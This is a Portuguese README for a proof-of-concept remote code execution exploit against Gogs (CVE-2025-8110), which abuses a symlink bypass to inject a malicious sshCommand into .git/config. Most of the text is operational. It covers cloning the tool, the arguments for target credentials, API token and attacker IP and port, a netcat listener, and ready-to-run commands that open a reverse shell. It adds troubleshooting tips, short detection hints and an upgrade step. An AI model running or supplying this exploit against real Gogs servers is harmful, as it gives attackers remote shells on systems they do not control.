
PoC de RCE no Gogs - CVE-2025-8110
Prova de Conceito para CVE-2025-8110 - Execução Remota de Código no Gogs via bypass de symlink e injeção de sshCommand.
Este exploit abusa de um bypass de symlink na API do Gogs para sobrescrever .git/config e injetar um sshCommand malicioso que executa uma reverse shell.
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
| Argumento | Descrição |
|---|
-u, --url | URL alvo do Gogs (ex., http://target:3000) |
-U, --username | Nome de usuário do Gogs |
-P, --password | Senha do Gogs |
-t, --token | Token da API do Gogs |
-lh, --host | Seu IP para reverse shell |
-lp, --port | Sua porta para listener |
-x, --proxy | Ativar proxy (localhost:8080) |
Faça login no Gogs → Configurações → Aplicações → Gerar token
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
| Problema | Solução |
|---|---|
| Falha no login | Verifique usuário/senha |
| Falha na criação do repositório | Regere o token da API |
| Tempo limite de leitura | Normal - verifique listener |
| Sem shell | Verifique firewall, tente porta diferente |
malicious_link em repositóriossshCommand em .git/configAtualize para Gogs v0.13.4 ou posterior:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
Esta ferramenta é apenas para fins educacionais e testes autorizados. Acesso não autorizado é ilegal.